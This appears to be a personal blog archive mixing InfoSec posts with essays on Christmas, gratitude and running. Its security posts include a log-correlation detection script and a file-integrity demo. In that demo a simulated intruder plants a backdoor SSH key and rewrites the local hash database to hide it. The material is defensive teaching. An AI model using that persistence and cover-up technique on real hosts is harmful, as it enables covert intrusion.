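    for t_probe in sorted(stages["probe"]):
        deadline = t_probe + window
        for t_dns in sorted(stages["bad_dns"]):
            if not t_probe <= t_dns <= deadline:
                continue
            for t_lat in sorted(stages["lateral"]):
                if t_dns <= t_lat <= deadline:
                    return {"probe": t_probe, "bad_dns": t_dns, "lateral": t_lat}
    return None


def correlate(log_text, window_minutes=10):
    """Return one alert per host whose events complete the chain, in order."""
    window = timedelta(minutes=window_minutes)
    events = defaultdict(lambda: defaultdict(list))   # host -> stage -> [ts]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stage = classify(m.group("rest"))
        if stage:
            events[m.group("host")][stage].append(datetime.fromisoformat(m.group("ts")))
    alerts = []
    for host, stages in events.items():
        chain = first_chain(stages, window)
        if chain:
            alerts.append({"host": host, **chain})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_LOGS):
        print(f"ALERT {a['host']}: probe {a['probe']} -> C2 lookup {a['bad_dns']}"
              f" -> file-server connection {a['lateral']}")
```

    Note what the rule does not fire on: web02 takes the same WordPress probe and later talks to the file server, but with no C2 lookup in between and hours apart, so it stays quiet. That is the whole point of correlation versus grepping everything forever; the window and the ordering are what keep the haystack small.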

    You see, to perform in-depth forensics, you have to have all of the logs (and pcaps and memory dumps and atop records and ....), not just those that are useful for correlation and alarming. That presents two problems:

    1. SIEM resources for non-security logs, and
    2. Fatigue and confusion for the front-line handlers.
    The space and horse-power of the SIEM is a finite resource, and even when money is no object, money is an object for non-revenue generating endeavors.

    (Added Saturday, December 21st; file under InfoSec; permalink)

    Unpopular truths, part 1

    I.

    If your regularly scheduled network scan catches a service that an intruder has set running -- say something like a command-n-control center -- it was blind-ass-luck. Network scanning isn't intended to catch intruders, it is intended to give your system, network, and security folks an idea of their threat surface and potential/actual risks.

    (That might not be as unpopular now as it once was, thanks to careful branding on the part of major market players.)

    II.

    Your file integrity checker -- Tripwire, AIDE, BART, awk -F : '{foo = sprintf("sha256 -c %s %s\n", $2, $1); if (system(foo) == 2) {print $1" has changed"}}' /etc/my_FIM_db, whatever -- is not an intrusion detection tool. Except, again, by blind-ass-luck. Yes, i have heard the pitch from the vendors, and yes, i know that AIDE stands for "Advanced Intrusion Detection Environment"; they are literally trying to sell you something. My Subaru says that it will go 140 MPH, and, who knows, it might; that's not its purpose, and it is really unlikely to do it well.

    What's funny is that they don't have to say that their FIM product is a HIDS for it to be valuable. The actual purpose of the tool is a big deal, and stands on its own. FIM is important, it just is a different control than "intrusion." Use FIM tools to note when your system has changed outside of planned updates; update your FIM database after every planned system update; use your FIM tools to validate that updates were successful.

    "But but but the trojans! Adding keys to root's authorized_keys! MALLLWAAAAAAREEEEE! How will we know? How will we know?" Look, it's like this: unless you are storing the DB off-host or on some sort of immutable, read-only media, and you are running your FIM in real time (maybe as an agent tied to auditd), whatever your scan window is is more than long enough for Mallory to update the database with values that suit him. Seriously: the first recommendation a popular (and privacy-friendly) search engine returns says to run weekly; more, it says to never run more frequently than daily. Do you really think Mallory won't be able to re-arrange the paintings and get a key made for the backdoor in a day?
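    To make the re-baselining problem concrete, an added example (not the post's code, and not how Tripwire or AIDE store their databases): a toy FIM whose hash database sits on the host in plaintext, the attack from the paragraph above run against it, and the same database sealed with an HMAC key the host never holds. The file paths, the key handling and the authorized_keys contents are constructed assumptions.

```python
# Added example (not the post's code): a writable local FIM database versus one
# sealed with an off-host key.  Paths, key handling and file contents are assumed.
import hashlib
import hmac
import json
import os
import tempfile


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_db(paths):
    """Baseline: path -> sha256, the same shape the awk one-liner consumes."""
    return {p: hash_file(p) for p in sorted(paths)}


def check(db, paths):
    """Paths that are new, missing, or whose content no longer matches db."""
    changed = []
    for p in sorted(set(db) | set(paths)):
        if p not in db or not os.path.exists(p) or hash_file(p) != db[p]:
            changed.append(p)
    return changed


def seal(db, key):
    """Serialize db with an HMAC so it can sit on the host but not be rewritten."""
    body = json.dumps(db, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return json.dumps({"db": db, "mac": tag}, sort_keys=True).encode()


def unseal(blob, key):
    doc = json.loads(blob)
    body = json.dumps(doc["db"], sort_keys=True).encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(doc["mac"], expected):
        raise ValueError("FIM database was rewritten without the sealing key")
    return doc["db"]


def demo():
    """Mallory plants an SSH key and re-baselines the local DB inside the scan window.
    Returns (what the plaintext local DB reports, whether Mallory's reseal is
    accepted, what the sealed baseline reports)."""
    key = os.urandom(32)            # lives with the verifier, never on the host
    with tempfile.TemporaryDirectory() as d:
        auth = os.path.join(d, "authorized_keys")
        with open(auth, "w") as f:
            f.write("ssh-ed25519 AAAA...legit admin@example.org\n")      # constructed
        paths = [auth]
        local_db = build_db(paths)      # writable DB on the host
        sealed = seal(local_db, key)    # same baseline, sealed with the off-host key

        # Intrusion: backdoor key appended, then the local DB is simply rebuilt.
        with open(auth, "a") as f:
            f.write("ssh-ed25519 AAAA...mallory mallory@evil.example\n")  # constructed
        local_db = build_db(paths)
        forged = seal(local_db, b"guess")   # Mallory has no key to reseal with

        naive_report = check(local_db, paths)       # [] : looks clean
        try:
            unseal(forged, key)
            forged_status = "accepted"
        except ValueError:
            forged_status = "rejected"
        sealed_report = check(unseal(sealed, key), paths)   # [auth]
        return naive_report, forged_status, sealed_report


if __name__ == "__main__":
    print(demo())
```

    Sealing the database only closes the silent re-baseline; it does nothing about the window itself, which is what an auditd- or inotify-driven agent, or running the comparison from another box, is for. And if Mallory is already root on the host, the checker binary is as editable as the database, so the comparison belongs somewhere Mallory is not.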

    (Added Tuesday, December 17th; file under InfoSec; permalink)

    The war on Christmas
    For years now, there has been mindless blathering about "the war on Christmas." The story always goes something like this: "the [other -- probably a derogatory term] are trying to make it illegal to say 'Merry Christmas.'" It is utter hogwash. Ask me how i really feel.

    That's not today's topic, directly.

    Halliburton told 800 people today that they no longer had jobs. Halliburton -- the company that was fed barrels of cash by V. P. Cheney, the company given no-bid contracts for at least two wars... these folks couldn't even wait until after the Holidays. Merry fscking Christmas.

    That, gentle reader, is the war on Christmas, the war on the spirit of generosity, caring, love by the forces of avarice, of the almighty .05% uptick in stock price. This is the season when we watch _A Miracle on 34th Street_, _A Christmas Carol_, and _It's a Wonderful Life_ -- heck, even National Lampoon rages against the profit-over-people mindset that our captains of industry carry.

    There is a war on Christmas happening, but it is not being waged by your friend who wishes you "happy holidays;" it is being waged by the heirs of Scrooge and Mr. Potter. It is being waged by people who have insulated themselves from "workers" so they can seriously contemplate a jam of the month club rather than giving a paycheck.

    (Added Tuesday, December 3rd; file under Random Thoughts; permalink)

    Thankfulness
    It is the season to contemplate gratitude, and i am nothing if not a follower of trends.

    It seems to me that walking the path of life with "I deserve" on one's lips is inviting bandits to steal one's contentment. If i choose to believe that the wages of sin is Hell, then, ultimately, the only thing i deserve is death and eternal suffering. Holding that, then, all else is a gift -- undeserved.

    If, then, all of life is a gift, then gratitude is probably the appropriate attitude to carry (Jubal Harshaw's position on gratitude notwithstanding... hmm, that position may very well be the root of the resentment that leads to "I deserve..."; further contemplation may be required). We are given countless blessings, i hold, and we should be grateful for them all. We should be grateful even when, like the Rubik's Revenge i received one Christmas, we can't understand the gift; trials can be like that.

    No one i know would ever accuse me of being overly cheery happy, and i should probably be a little sad about that, being a "the kingdom of Heaven is here, now!" adherent. I'm not sad about that, though, because i have eyes, and i see the ugly and horrible in the here-and-now as well as the beauty and wonderful. I am grateful that i can see both; i am grateful that the ugly and the horrible pains me each day, because it means i still have empathy and a sense of justice; i am grateful for the beauty and wonder because it is beautiful and wonderful, but also because it is a balm for the pains, and fends off despair.

    I am grateful for mercy, because i require a lot of it, especially when i realize that i have not shown enough of it.

    I am grateful for love, for the people who have shown me both how to give and how to accept it. I can't imagine that i am easy to love, and thus am ever challenged accepting that gift from others; the examples of gracious acceptance are fine gifts indeed.

    I am grateful each day to have survived the day, physically, emotionally, and spiritually. At the close of the day, i may have victories, i may have defeats, i may beam with contentment or i may burn the paint from the walls with my self-loathing; in all cases, i know that i have been blessed to have another day.

    I am most grateful for grace, because grace is the source of the many gifts i have received. By grace alone have i not received the wages i deserve, and do i believe that i will never get what i deserve.

    (Added Monday, December 2nd; file under Theology,Random Thoughts; permalink)

    streaks
    The Dead Runners' Society used to have an annual 100 day challenge, in which participating members would run, walk, or otherwise exercise every day for the first 100 days of the year. I was never willing to participate, because i've historically been more motivated by rebelling against expectations than i have been by winning. I always followed it, though, because watching people face their challenges is always up-lifting.

    For 2014, i decided to "shadow" the challenge. I hadn't run a single day in December of 2013, and i've defined myself by running since i was 13, so i wanted something to get me going. I set a personal standard of 3.2 km a day, which i called "2 miles," and on 1 January, i logged the first day.

    It was hard. Forming a new habit is hard, carving out time to run each day was hard, doing that in the middle of a Montana winter was hard. It was not monumentally hard. It just meant putting on shoes and doing it.

    One hundred days puts things around 10 April, depending upon the year. I remember looking forward to the end through much of March, because it was time i could spend doing something else, and, ultimately, it was a silly quest. But, April 11th dawned, and i said "well, you might as well do another day." Plus, i'd signed up to do the duathlon in the Peaks to Prairie, so i "needed" the runs. So i kept at it. And it was easier through the summer, because there was always another target race, and getting mileage is easier when running every day. And, since i was running regularly, i started setting old-guy PRs.

    That fall, i completed two marathons, 28 days apart. My streak remained intact, with painful recovery runs the days after each marathon. By that time, i'd settled on keeping the streak for a year. Then 1 January rolled around, and i already had the habit; i went for a run.

    Blah. blah, blah... 2019 is coming to a close, and i've only added streaks: I started logging at least 20 miles each week in September of 2015 (the week i had the flu in 2017 was... rough); i have 12 straight months with at least 200 km. It's all just arbitrary numbers, but it becomes habit.

    This is a throw-away, because i want to write at least once a day in December until Christmas, and the 1st is almost over.

    (Added Sunday, December 1st; file under Running; permalink)

    Movement and helpfulness
    Skipping the preamble...

    Computer stuff is all just 1's and 0's, so the answer to any "can we do X" question that is software related will always be "yes." Giving that response without factoring in values -- asking yourself whether it is something that one should do -- is self-delusion at best and, more likely, malfeasance.

    Seriously. Don't be that asshole who prioritizes movement and/or helpfulness over guidance and diligence. You may think you're being all DevOps-ey, but all you are really doing is scheduling an appearance before some Congressional subcommittee for some hapless executive who was fscking relying on your expertise to inform the decision. History is riddled with tales of evil that came from not applying values to these types of decisions. ("Hey, is it possible to give Cambridge Analytica access to all of the data we tell our users is private? They'll pay." "Sure is, boss. Maybe 15 minutes to arrange." "Excellent! I get another Ferrari!" Fscking selling out humanity for a p**** substitute. Ask me how i really feel.) Ask Volkswagen how happy they were about "helpful."

    Not every request is a Project Dragonfly, of course; most "can we do X" questions are not going to be seeking to enable human rights violations. Most questions are still going to be posed by non-experts, however.

    Ask not whether something is possible; rather, ask if it is correct. If you are only giving movement and trying to be helpful, you aren't giving any value-add over machine learning.

    (Added Thursday, October 31st; file under InfoSec; permalink)

    But ya gotta know the territory
    The controls one puts into effect and the way one focusses one's energies must be driven by the environment one defends, if one has any hope of success.

    That's pretty wordy, as is my wont. Essentially, it doesn't matter what the speaker at NDSS says*, you have to prioritize and design for what you have. It doesn't make much sense to hire armed security if everyone works remotely; it doesn't make sense to focus on Windows logs when you have 100k Linux hosts hanging on the 'Net and 4 Windows hosts running your surveillance cameras; it doesn't make much sense to worry about geo locations if you can't restrict by them.

    This stuff isn't one-size-fits-all. Department of Energy research locations have different threat models than HS for major retailers than Cyber Monday shops than POS devices than ISPs than video streamers, and anyone who tells you that you need a DLP/Sandbox/Reputation service because that's what S-Mart installed after the Deadites rolled in should be quickly shown the door -- unless S-Mart and Deadites are your threat model, in which case you might give the recommendation some thought.

    It's risky when "outsiders" come in, because we are all zealots for some sort of technology (Chuck rulzers!), and we carry that with us even when we try not to. And, let's face it, when you recruit someone who might be offering recommendations on how to secure your stuff, you are counting on hir to be able to bring past experience and expertise.

    You just have to remember that you don't actually need a detector for optical vampire tapping on an all-copper network.

    * s/NDSS/Black Hat/g changes nothing but the venue.

    (Added Wednesday, October 23rd; file under InfoSec; permalink)

    The Dancing Frogs

    "Everyone wants to see the dancing frogs."

    It is something i've said from very early in my career in information security. Not from the start; at the start, i thought what all new practitioners think: if i configure the firewall and the hosts right, i'll succeed in keeping things safe. Eventually, we all learn differently.

    The dancing frogs are almost never going to be hastily and poorly drawn ballroom dancers, waltzing off the edge of a piece of scrap paper. The dancing frogs used to be a cool game on a floppy that would install Michelangelo, or an "Important Message From (your colleague who already saw the dancing frogs)," or that cool new website off on the side streets of the 'Net. Now, the dancing frogs can be that USB drive you found in the parking lot, or mail from "your bank" about a disputed charge, or a "security alert" from "Google" sent to a gaggle of high-value targets.

    People always want to click to see the dancing frogs. They'll do it the day after they take their corporate security awareness training. They'll do it from high security locations. They'll do it because Mallory can find a bait with the right degree of insignificance or urgency to hook a target, and it's hard to break free of the line once that happens.

    (Added Monday, October 21st; file under InfoSec,Axioms; permalink)

    Beg buttons
    I live where winter temperatures drop to -33 C a few times every year. When i run on those days, i have to set my route to avoid crossing any streets at a traffic light, because "beg buttons" can mean standing around for 3-5 minutes waiting for the blessing of the walker icon. That's 3-5 minutes in probably sweat-soaked clothing (because i'm certain to start with extra clothing, just in case something bad happens and i have to walk), at a temperature that is life-threatening.

    While i am standing around, gambling that neither hypothermia nor frostbite will kick in, the people who matter to DOT are zooming by in heated comfort. Often, while i am trying to decide if i am suffering from delusions as my brain shuts down from the cold, i pine for the "beg buttons" that prioritize the pedestrian -- those sweet sweet devices that immediately set a flurry of flashing lights to tell the drivers to stop for the meat-sack that is at the cross-walk.

    (Added Sunday, October 20th; file under Running,Advocacy; permalink)